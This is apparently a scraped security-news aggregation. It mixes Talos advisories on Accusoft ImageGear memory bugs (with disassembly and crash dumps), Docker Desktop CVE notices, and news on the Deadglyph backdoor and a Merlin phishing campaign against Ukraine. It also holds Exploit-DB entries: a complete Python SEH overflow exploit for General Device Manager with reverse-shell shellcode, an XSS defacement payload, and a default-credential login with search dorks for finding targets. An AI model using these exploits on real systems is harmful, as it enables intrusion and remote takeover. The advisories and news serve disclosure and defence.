A use-after-free vulnerability exists in the tif_parse_sub_IFD functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to arbitrary code execution. An attacker can deliver file to trigger this vulnerability.

CVE-2023-39453: TALOS-2023-1830 || Cisco Talos Intelligence Group

A heap-based buffer overflow vulnerability exists in the CreateDIBfromPict functionality of Accusoft ImageGear 20.1. A specially crafted file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2023-23567: TALOS-2023-1729 || Cisco Talos Intelligence Group

An out-of-bounds write vulnerability exists in the dcm_pixel_data_decode functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.

**SUMMARY**

An out-of-bounds write vulnerability exists in the dcm\_pixel\_data\_decode functionality of Accusoft ImageGear 20.1. A specially crafted malformed file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Accusoft ImageGear 20.1

**PRODUCT URLS**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-191 - Integer Underflow (Wrap or Wraparound)

**DETAILS**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed Dicom, we end up in the following situation:

    eax=00004000 ebx=00000008 ecx=00000000 edx=00000000 esi=ffffcfdf edi=136b1000
    eip=75059a65 esp=0019fa50 ebp=0019fad0 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    igMED20d!CPb_MED_init+0x169c5:
    75059a65 897cb58c        mov     dword ptr [ebp+esi*4-74h],edi ss:002b:001939d8=????????
    

The crash happens in LINE16 below in a function identified as dcm_pixel_data_decode:

    LINE1  8b45ec             mov     eax, dword [ebp-0x14 {l_value}]
    LINE2  68db100000         push    0x10db {var_88_3}
    LINE3  0fb700             movzx   eax, word [eax]
    LINE4  68a0c40775         push    data_7507c4a0 {var_8c_3}{"..\..\..\..\Common\Components\ME…"}
    LINE5  57                 push    edi {var_90_3}
    LINE6  be0f000000         mov     esi, 0xf
    LINE7  6a00               push    0x0 {ptr_var34}
    LINE8  2bf0               sub     esi, eax
    LINE9  ff15c0130b75       call    dword [AF_memm_alloc]
    LINE10 8bf8               mov     edi, eax
    LINE11 8b45e4             mov     eax, dword [ebp-0x1c {l_buffer_size_1}]
    LINE12 99                 cdq     
    LINE13 2bc2               sub     eax, edx
    LINE14 d1f8               sar     eax, 0x1
    LINE15 33c9               xor     ecx, ecx  {0x0}
    LINE16 897cb58c           mov     dword [ebp+esi*4-0x74 {obj_str_sz_0x40}], edi
    LINE17 85c0               test    eax, eax
    LINE18 7e0e               jle     0x75059a7b
    

The register esi is a very big value, as result of an integer underflow. We can see at LINE6, it was set to a constant 0xf and subtracted by the register eax LINE8.  
There is no check on the value of register eax, causing the very large number. eax gets its value at LINE1, which is under our control into the malformed file.  
At LINE16 we can influence the stack pointer ebp with esi, as that depends on the content of the file, which means we can choose where in the stack to write edi. The value pointed by the register edi is a result of AF_memm_alloc, which is some kind of wrapper of malloc.

By controlling the eax register an attacker can overwrite anywhere in the stack, possibly leading to code execution.

**Crash Information**

    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    Unable to load image E:\ImageGearFuzzing\bin\igCore20d.dll, Win32 error 0n2
    
    KEY_VALUES_STRING: 1
    
        Key  : AV.Fault
        Value: Write
    
        Key  : Analysis.CPU.mSec
        Value: 375
    
        Key  : Analysis.Elapsed.mSec
        Value: 2704
    
        Key  : Analysis.IO.Other.Mb
        Value: 0
    
        Key  : Analysis.IO.Read.Mb
        Value: 0
    
        Key  : Analysis.IO.Write.Mb
        Value: 0
    
        Key  : Analysis.Init.CPU.mSec
        Value: 4061
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 65613
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 179
    
        Key  : Failure.Bucket
        Value: INVALID_POINTER_WRITE_AVRF_c0000005_igMED20d.dll!Unknown
    
        Key  : Failure.Hash
        Value: {7bd32a5f-d13c-5070-0693-11be1df9b256}
    
        Key  : Timeline.OS.Boot.DeltaSec
        Value: 440574
    
        Key  : WER.Process.Version
        Value: 1.0.1.1
    
    
    NTGLOBALFLAG:  2100000
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APPLICATION_VERIFIER_LOADED: 1
    
    EXCEPTION_RECORD:  (.exr -1)
    ExceptionAddress: 75059a65 (igMED20d!CPb_MED_init+0x000169c5)
       ExceptionCode: c0000005 (Access violation)
      ExceptionFlags: 00000000
    NumberParameters: 2
       Parameter[0]: 00000001
       Parameter[1]: 001939d8
    Attempt to write to address 001939d8
    
    FAULTING_THREAD:  00001a78
    
    PROCESS_NAME:  Fuzzme.exe
    
    WRITE_ADDRESS:  001939d8 
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:  c0000005
    
    EXCEPTION_PARAMETER1:  00000001
    
    EXCEPTION_PARAMETER2:  001939d8
    
    STACK_TEXT:  
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0019fad0 750592f0     0019fc3c 10694fa0 1000001e igMED20d!CPb_MED_init+0x169c5
    0019fb04 750567e0     0019fc3c 10694fa0 1000001e igMED20d!CPb_MED_init+0x16250
    0019fbb4 755a15b9     0019fc3c 10680fb8 00000001 igMED20d!CPb_MED_init+0x13740
    0019fbec 755e08bc     00000000 10680fb8 0019fc3c igCore20d!IG_image_savelist_get+0xb29
    0019fe68 755e0239     00000000 05c26fd0 00000001 igCore20d!IG_mpi_page_set+0x1479c
    0019fe88 75575bc7     00000000 05c26fd0 00000001 igCore20d!IG_mpi_page_set+0x14119
    0019fea8 00402399     05c26fd0 0019febc 75c6fb80 igCore20d!IG_load_file+0x47
    0019fec0 004026c0     05c26fd0 05c28fe0 05b8cf50 Fuzzme!fuzzme+0x19
    0019ff28 00408407     00000005 05b86f78 05b8cf50 Fuzzme!fuzzme+0x340
    0019ff70 75c700c9     002d4000 75c700b0 0019ffdc Fuzzme!fuzzme+0x6087
    0019ff80 77cc7b4e     002d4000 65bf4f61 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77cc7b1e     ffffffff 77ce8c7f 00000000 ntdll!__RtlUserThreadStart+0x2f
    0019ffec 00000000     0040848f 002d4000 00000000 ntdll!_RtlUserThreadStart+0x1b
    
    
    STACK_COMMAND:  ~0s ; .cxr ; kb
    
    SYMBOL_NAME:  igMED20d+169c5
    
    MODULE_NAME: igMED20d
    
    IMAGE_NAME:  igMED20d.dll
    
    FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_AVRF_c0000005_igMED20d.dll!Unknown
    
    OSPLATFORM_TYPE:  x86
    
    OSNAME:  Windows 8
    
    IMAGE_VERSION:  20.1.0.117
    
    FAILURE_ID_HASH:  {7bd32a5f-d13c-5070-0693-11be1df9b256}
    
    Followup:     MachineOwner
    ---------
    

**VENDOR RESPONSE**

Release notes from the vendor can be found here:

https://help.accusoft.com/ImageGear/v20.3/Windows/DLL/webframe.html#release-notes.html

https://help.accusoft.com/ImageGear/v20.3/Linux/webframe.html#release-notes.html

**TIMELINE**

2023-07-18 - Vendor Disclosure  
2023-09-20 - Vendor Patch Release  
2023-09-25 - Public Release

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2023-32653: TALOS-2023-1802 || Cisco Talos Intelligence Group

Docker Desktop before 4.12.0 is vulnerable to RCE via a crafted extension description or changelog.

This issue affects Docker Desktop: before 4.12.0.



CVE-2023-0625: Docker Desktop release notes

Docker Desktop before 4.23.0 allows Access Token theft via a crafted extension icon URL.

This issue affects Docker Desktop: before 4.23.0.



CVE-2023-5166: Docker Desktop release notes

By Waqas
Stealth Falcon APT group is notorious for its cyber-espionage campaigns in the Middle East.
This is a post from HackRead.com Read the original post: Deadglyph: A New Backdoor Linked to Stealth Falcon APT in the Middle East

ESET warns that Deadglyph is a highly sophisticated backdoor that is mixed with different programming languages to add an extra layer of complexity.

The Middle East has once again found itself in the crosshairs of a new cybersecurity threat. Recent findings by experts at ESET Research have unveiled a highly sophisticated and previously unknown cyber-espionage tool they’ve dubbed “Deadglyph.”

This discovery is a significant development in the world of cybersecurity, as it’s the first time this secretive threat has been publicly analyzed. Even more concerning, Deadglyph has been traced back to the Stealth Falcon APT group, notorious for its cyber-espionage campaigns in the Middle East.

****What is Deadglyph?****

Deadglyph gets its name from distinctive artifacts found within the malicious software. These artifacts, such as “0xDEADB001,” and the use of homoglyph attacks (where similar-looking characters replace regular ones) indicate a high level of sophistication behind its design. It’s important to note that this isn’t your typical cyber threat; it’s a highly advanced and covert tool.

****Unusual Architecture Raises Concerns****

One of the standout features of Deadglyph is its unique architecture. Unlike most malware that relies on a single programming language, Deadglyph uses a combination of two: an x64 binary and a .NET assembly. This is quite unusual and suggests that the creators went to great lengths to make it harder to analyze. Mixing different programming languages also adds an extra layer of complexity.

What sets Deadglyph apart is that it doesn’t come with pre-set commands like traditional malware. Instead, it fetches its instructions from a remote server, giving it a flexible and adaptable nature.

****The Stealth Falcon APT Group****

The experts at ESET Research have connected Deadglyph to the Stealth Falcon APT group. This group has been active since 2012 and is believed to have ties to the United Arab Emirates. Its primary targets include political activists, journalists, and dissidents in the Middle East. The group’s activities were first exposed by Citizen Lab in 2016.

There are suggestions that Stealth Falcon and another group called Project Raven are one and the same, as they seem to have overlapping targets and tactics. The revelation of Deadglyph adds another layer of complexity to this enigmatic group’s toolkit.

****Breaking Down Deadglyph’s Operation****

Deadglyph’s operation is a complex chain of events. It starts with a registry shellcode loader that’s used to load shellcode from the Windows registry. This shellcode, in turn, loads the main part of Deadglyph, known as the Executor. What’s unique is that only the initial loader exists as a file on the victim’s computer; the rest remains encrypted within a registry entry.

While the exact method of infection isn’t clear, it’s suspected that an installer component plays a role in getting the malicious code onto a victim’s system.

****The Role of the Orchestrator****

The Orchestrator, written in .NET, is the central component of Deadglyph. Its primary job is to communicate with a remote server and execute commands, often with the help of the Executor. The Orchestrator is highly obfuscated, making it even more challenging to analyze. In essence, it acts as the control center for Deadglyph’s operations.

****Communication and Commands****

According to ESET’s report, Deadglyph uses two embedded modules, Timer and Network, for communication with its remote server. These modules are obfuscated as well. The Timer module executes tasks at set intervals, while the Network module handles communication with the server. Deadglyph also has the ability to uninstall itself if it loses contact with the server for an extended period.

****Modules: The Heart of Deadglyph****

Deadglyph’s core capabilities are delivered through additional modules obtained from the server. ESET researchers managed to obtain three such modules, shedding light on Deadglyph’s potential. However, it’s believed that there could be as many as fourteen modules in total, each adding unique functionality.

*   **Process Creator (Module 0x69)**: This module can execute specific commands as new processes and provide the results back to Deadglyph’s control center.
*   **Info Collector (Module 0x6C)**: This module gathers extensive information about the infected system, including operating system details, installed software, network adapters, and more.
*   **File Reader (Module 0x64)**: This module reads specified files and shares their contents, with an option to delete the files afterward.

****Multistage Shellcode Downloader Chain****

While investigating Deadglyph, ESET researchers stumbled upon a complex multistage shellcode downloader chain. This chain is believed to be used in the installation process of Deadglyph and shares similarities with the main threat.

The chain involves multiple stages, starting with a CPL file designed to download shellcode. This shellcode is then injected into a host process, ultimately leading to the loading of a .NET assembly that serves as a shellcode downloader.

****In Conclusion: A Disturbingly Complex Threat****

The discovery of Deadglyph shines a spotlight on the ever-evolving tactics of APT groups, particularly those targeting the Middle East. Its intricate architecture, dynamic modules, and counter-detection mechanisms make it a formidable digital threat. Organizations and individuals in the region need to remain vigilant and ensure their cybersecurity measures are up to the task of defending against such advanced threats.

****RELATED ARTICLES****

Chinese APT Flax Typhoon uses legit tools for cyber espionage

Chinese APT Slid Fake Signal, Telegram Apps onto Official App Stores

Deadglyph: A New Backdoor Linked to Stealth Falcon APT in the Middle East

General Device Manager 2.5.2.2 is vulnerable to Buffer Overflow.

    # Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
    # Date: 30.07.2023
    # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
    # Software Link 2:
    https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
    # Exploit Author: Ahmet Ümit BAYRAM
    # Tested Version: 2.5.2.2
    # Tested on: Windows 10 64bit
    
    # 1.- Run python code : exploit.py
    # 2.- Open pwned.txt and copy all content to clipboard
    # 3.- Open Device Manage and press Add Device
    # 4.- Paste the content of pwned.txt into the 'IP Address'
    # 5.- Click 'OK'
    # 6.- nc.exe local IP Port 1337 and you will have a bind shell
    # 7.- R.I.P. Condor <3
    
    import struct
    
    offset = b"A" * 1308
    
    nseh = b"\xEB\x06\x90\x90" # jmp short
    
    seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
    
    
    nops = b"\x90" * 32 
    
    #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
    
    shellcode =  b""
    shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
    shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
    shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
    shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
    shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
    shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
    shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
    shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
    shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
    shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
    shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
    shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
    shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
    shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
    shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
    shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
    shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
    shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
    shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
    shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
    shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
    shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
    shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
    shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
    shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
    shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
    shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
    shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
    shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
    shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
    shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
    
    
    final_payload = offset + nseh + seh + nops + shellcode
    
    # write the final payload to a file
    try:
        with open('pwned.txt', 'wb') as f:
            print("[+] Creating %s bytes evil payload..." %len(final_payload))
            f.write(final_payload)
            f.close()
            print("[+] File created!")
    except:
        print("File cannot be created!")

CVE-2023-43131: OffSec’s Exploit Database Archive

LogoBee CMS version 0.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : LogoBee CMS v0.2 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://logobee.com                                                                                                |  | # Dork      : intext:''Logo & Web Design by LogoBee''                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /updates.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://vaxform127.0.0.1/updates.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

LogoBee CMS 0.2 Cross Site Scripting

Lamano LMS version 0.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lamano LMS v0.1 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.lamano.lu/                                                                                              |  | # Dork      :  © 2018 Lamano by easysolutions                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] Use payload : user = admin & Pass : 1234[+] https://www.sylviebecker127.0.0.1luGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Lamano LMS 0.1 Insecure Settings

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin.
"Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin.

"Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

The cybersecurity company is tracking the campaign under the name **STARK#VORTEX**.

The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file that, when opened, runs malicious JavaScript embedded inside one of the HTML pages to execute PowerShell code designed to contact a remote server to fetch an obfuscated binary.

The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.

"While the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection," the researchers said.

This is the first time Ukrainian government organizations have been targeted using Merlin. In early August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain that employs CHM files as decoys to infect the computers with the open-source tool.

CERT-UA attributed the intrusions to a threat actor it monitors under the name UAC-0154.

"Files and documents used in the attack chain are very capable of bypassing defenses," the researchers explained.

UPCOMING WEBINAR

Fight AI with AI — Battling Cyber Threats with Next-Gen AI Tools

Ready to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.

Supercharge Your Skills

"Typically receiving a Microsoft help file over the internet would be considered unusual. However, the attackers framed the lure documents to appear as something an unsuspecting victim might expect to appear in a help-themed document or file."

The development arrives weeks after the CERT-UA said it detected an unsuccessful cyber attack against an unnamed critical energy infrastructure facility in the country undertaken by the Russian state-sponsored crew called APT28.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows